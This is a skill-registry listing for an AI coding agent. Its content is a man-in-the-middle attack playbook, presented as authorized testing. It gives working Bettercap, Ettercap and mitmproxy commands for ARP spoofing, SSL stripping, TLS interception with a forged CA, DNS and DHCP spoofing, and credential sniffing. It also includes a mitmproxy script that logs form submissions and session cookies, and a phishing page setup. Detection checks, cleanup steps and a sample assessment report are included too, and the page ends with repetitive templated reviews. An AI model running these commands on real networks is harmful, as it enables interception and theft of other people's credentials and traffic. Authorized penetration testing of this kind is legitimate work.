Simulates man-in-the-middle attacks using Ettercap, mitmproxy, and Bettercap in authorized environments to intercept, analyze, and modify network traffic for testing encryption enforcement, certificate validation, and detection capabilities.
Works with
AI-first code editor with Composer
Before installing skills in Cursor, ensure your development environment meets these requirements:
node --versionconducting-man-in-the-middle-attack-simulationExecute the skills CLI command in your project's root directory to begin installation:
Fetches conducting-man-in-the-middle-attack-simulation from mukul975/Anthropic-Cybersecurity-Skills and configures it for Cursor.
The CLI shows a list of agents. Use arrow keys and space to select Cursor:
Confirm successful installation by checking the skill directory location:
Restart Cursor to activate conducting-man-in-the-middle-attack-simulation. Access via /conducting-man-in-the-middle-attack-simulation in your agent's command palette.
We perform automated surface-level scans (Gen AI Scanner, Socket, Snyk) during installation. These checks detect common vulnerabilities but do not guarantee complete security. Always review skill source code and verify the publisher's reputation before production use.
Skills execute code in your environment. Always review source, verify the publisher, and test in isolation before production.
Submit your Claude Code skill and start earning
Automate repetitive workflows and reduce manual effort
Example
Generate reports, summarize documents, draft communications
Save 3-5 hours per week on routine tasks
Learn new skills, understand complex topics, get expert guidance
Example
Explain concepts, provide examples, suggest learning resources
Accelerate learning and skill development by 2x
Enhance output quality through reviews, suggestions, and refinements
Example
Review drafts, suggest improvements, catch errors
Improve work quality by 30-40% with less effort
0
total installs
0
this week
8.6K
GitHub stars
0
upvotes
Run in your terminal
0
installs
0
this week
8.6K
stars
| name | conducting-man-in-the-middle-attack-simulation |
| description | 'Simulates man-in-the-middle attacks using Ettercap, mitmproxy, and Bettercap in authorized environments to intercept, analyze, and modify network traffic for testing encryption enforcement, certificate validation, and detection capabilities. ' |
| domain | cybersecurity |
| subdomain | network-security |
| tags | - network-security - mitm - bettercap - ettercap - mitmproxy |
| version | '1.0' |
| author | mahipal |
| license | Apache-2.0 |
| nist_csf | - PR.IR-01 - DE.CM-01 - ID.AM-03 - PR.DS-02 |
Do not use on production networks without explicit written authorization and a rollback plan, against systems you do not own or have permission to test, or for intercepting communications of uninvolved third parties.
# Enable IP forwarding
sudo sysctl -w net.ipv4.ip_forward=1
sudo sysctl -w net.ipv6.conf.all.forwarding=1
# Disable ICMP redirects
sudo sysctl -w net.ipv4.conf.all.send_redirects=0
# Generate a CA certificate for TLS interception
openssl genrsa -out mitm-ca.key 4096
openssl req -new -x509 -days 30 -key mitm-ca.key -out mitm-ca.crt \
-subj "/CN=MITM Test CA/O=Security Assessment/C=US"
# Discover hosts on the target network
sudo bettercap -iface eth0 -eval "net.probe on; sleep 10; net.show; quit"
# Start Bettercap with interactive mode
sudo bettercap -iface eth0
# Enable network probing to discover hosts
> net.probe on
# Display discovered hosts
> net.show
# Set target (victim: 192.168.1.50, gateway: 192.168.1.1)
> set arp.spoof.targets 192.168.1.50
> set arp.spoof.fullduplex true
# Start ARP spoofing
> arp.spoof on
# Enable HTTP proxy for traffic inspection
> set http.proxy.sslstrip true
> http.proxy on
# Enable HTTPS proxy with certificate interception
> set https.proxy.certificate mitm-ca.crt
> set https.proxy.key mitm-ca.key
> https.proxy on
# Enable DNS spoofing for specific domains
> set dns.spoof.domains example.com,*.example.com
> set dns.spoof.address 192.168.1.99
> dns.spoof on
# Enable credential sniffer
> set net.sniff.verbose true
> set net.sniff.filter "tcp port 80 or tcp port 21 or tcp port 110"
> net.sniff on
# Start mitmproxy as transparent proxy
sudo mitmproxy --mode transparent --set confdir=~/.mitmproxy \
--set ssl_insecure=true -w mitm_capture.flow
# Configure iptables to redirect traffic through mitmproxy
sudo iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-port 8080
sudo iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 443 -j REDIRECT --to-port 8080
# Use mitmproxy scripting for automated credential extraction
cat > extract_creds.py << 'PYEOF'
"""mitmproxy script to extract credentials from intercepted traffic."""
from mitmproxy import http
import json
def request(flow: http.HTTPFlow):
if flow.request.method == "POST":
content_type = flow.request.headers.get("content-type", "")
if "form" in content_type or "json" in content_type:
with open("captured_forms.log", "a") as f:
f.write(f"URL: {flow.request.pretty_url}\n")
f.write(f"Data: {flow.request.get_text()}\n")
f.write("---\n")
def response(flow: http.HTTPFlow):
# Log authentication cookies
if "set-cookie" in flow.response.headers:
with open("captured_cookies.log", "a") as f:
f.write(f"URL: {flow.request.pretty_url}\n")
f.write(f"Cookie: {flow.response.headers['set-cookie']}\n")
f.write("---\n")
PYEOF
sudo mitmproxy --mode transparent -s extract_creds.py -w mitm_capture.flow
# DNS spoofing with Ettercap
sudo tee /etc/ettercap/etter.dns << 'EOF'
# Redirect target domain to attacker's web server
example.com A 192.168.1.99
*.example.com A 192.168.1.99
www.example.com A 192.168.1.99
EOF
sudo ettercap -T -q -i eth0 -M arp:remote -P dns_spoof /192.168.1.50// /192.168.1.1//
# DHCP spoofing with Bettercap (offer rogue DHCP with attacker as gateway)
sudo bettercap -iface eth0
> set dhcp6.spoof.domains example.com
> dhcp6.spoof on
# Set up a phishing page on the attacker machine
sudo python3 -m http.server 80 --directory /var/www/phishing/
# Verify certificate pinning is working on the target application
# If the app rejects the MITM CA, certificate pinning is effective
# Check the target machine for certificate errors
# Test HSTS enforcement
# If browser refuses HTTP connection after initial HTTPS, HSTS is working
curl -v -k -L http://example.com 2>&1 | grep -i "strict-transport-security"
# Verify IDS detection of ARP spoofing
# Check Snort/Suricata alerts for ARP anomalies
grep -i "arp" /var/log/snort/alert_fast.txt
# Check if switch detected the attack (DAI logs)
# On Cisco switch: show ip arp inspection log
# Test network monitoring tools
# Verify that Zeek generated appropriate notices
cat /opt/zeek/logs/current/notice.log | zeek-cut note msg
# Capture evidence of successful/failed interception
tshark -i eth0 -f "host 192.168.1.50" -w mitm_evidence.pcapng -a duration:300
# Stop all MITM attacks
# In Bettercap:
> arp.spoof off
> http.proxy off
> https.proxy off
> dns.spoof off
> quit
# Restore IP forwarding
sudo sysctl -w net.ipv4.ip_forward=0
# Remove iptables rules
sudo iptables -t nat -F PREROUTING
# Verify ARP tables are restored on target hosts
# The target should re-learn correct MAC addresses via normal ARP
# Force ARP cache refresh (from target machine)
# arp -d 192.168.1.1 && ping -c 1 192.168.1.1
# Remove test CA certificate from any systems where it was installed
# Remove capture files containing sensitive data per engagement agreement
# Generate documentation
echo "MITM Simulation completed at $(date)" >> mitm_report.txt
sha256sum mitm_capture.flow mitm_evidence.pcapng >> mitm_report.txt
| Term | Definition |
|---|---|
| Man-in-the-Middle (MITM) | Attack where the adversary secretly intercepts and potentially alters communication between two parties who believe they are communicating directly |
| SSL Stripping | Downgrade attack that converts HTTPS connections to HTTP by intercepting the initial HTTP request before the TLS upgrade, bypassing encryption |
| HSTS (HTTP Strict Transport Security) | Browser security policy that forces HTTPS connections and prevents SSL stripping by caching the requirement for encrypted connections |
| Certificate Pinning | Application security control that validates server certificates against a pre-configured set of trusted certificates, detecting MITM proxy certificates |
| ARP Cache Poisoning | Layer 2 attack technique that corrupts the ARP cache of target hosts to redirect traffic through the attacker's machine |
| Transparent Proxy | Proxy that intercepts traffic without requiring client-side configuration, typically using iptables REDIRECT rules to capture traffic destined for standard ports |
Context: A development team claims their internal web application enforces HTTPS with HSTS and certificate pinning. The security team needs to verify these controls during an authorized assessment. The application runs on 10.10.20.50 and is accessed by workstations on the 10.10.1.0/24 VLAN.
Approach:
Pitfalls:
## MITM Simulation Report
**Test ID**: MITM-2024-001
**Date**: 2024-03-15 14:00-16:00 UTC
**Target Application**: https://app.internal.corp (10.10.20.50)
**Test Workstation**: 10.10.1.100
**Attacker Machine**: 10.10.1.99
### Control Validation Results
| Control | Status | Details |
|---------|--------|---------|
| HTTPS Redirect | PASS | HTTP requests redirect to HTTPS with 301 |
| HSTS Header | PASS | max-age=31536000; includeSubDomains; preload |
| SSL Stripping (Browser) | BLOCKED | HSTS prevents downgrade in Chrome/Firefox |
| SSL Stripping (Thick Client) | VULNERABLE | Client follows HTTP redirect without HSTS |
| Cert Pinning (Browser) | N/A | Standard CA validation only |
| Cert Pinning (Thick Client) | VULNERABLE | Accepts MITM CA without validation |
| IDS Detection | PASS | Snort generated ARP spoof alert in 12 seconds |
### Recommendations
1. Implement certificate pinning in the thick client (high priority)
2. Add HSTS preload list submission for the domain
3. Enable DAI on access-layer switches for Layer 2 protection
4. Configure application to reject connections from non-pinned certificates
Prerequisites
Time Estimate
15-45 minutes depending on use case complexity
Steps
Common Pitfalls
✓ Do
✗ Don't
💡 Pro Tips
✓ Use when
Use when skill capabilities match your task, clear ROI on time saved, and you can validate outputs. Best for repetitive tasks, learning, and quality improvement.
✗ Avoid when
Avoid when task requires deep expertise you can't validate, involves sensitive decisions, or when learning process is more valuable than speed of completion.
mukul975/Anthropic-Cybersecurity-Skills
mukul975/Anthropic-Cybersecurity-Skills
mukul975/Anthropic-Cybersecurity-Skills
mukul975/Anthropic-Cybersecurity-Skills
mukul975/Anthropic-Cybersecurity-Skills
mukul975/Anthropic-Cybersecurity-Skills
We added conducting-man-in-the-middle-attack-simulation from the explainx registry; install was straightforward and the SKILL.md answered most questions upfront.
Keeps context tight: conducting-man-in-the-middle-attack-simulation is the kind of skill you can hand to a new teammate without a long onboarding doc.
conducting-man-in-the-middle-attack-simulation is among the better-maintained entries we tried; worth keeping pinned for repeat workflows.
Registry listing for conducting-man-in-the-middle-attack-simulation matched our evaluation — installs cleanly and behaves as described in the markdown.
conducting-man-in-the-middle-attack-simulation fits our agent workflows well — practical, well scoped, and easy to wire into existing repos.
Registry listing for conducting-man-in-the-middle-attack-simulation matched our evaluation — installs cleanly and behaves as described in the markdown.
conducting-man-in-the-middle-attack-simulation reduced setup friction for our internal harness; good balance of opinion and flexibility.
Keeps context tight: conducting-man-in-the-middle-attack-simulation is the kind of skill you can hand to a new teammate without a long onboarding doc.
We added conducting-man-in-the-middle-attack-simulation from the explainx registry; install was straightforward and the SKILL.md answered most questions upfront.
conducting-man-in-the-middle-attack-simulation fits our agent workflows well — practical, well scoped, and easy to wire into existing repos.
showing 1-10 of 63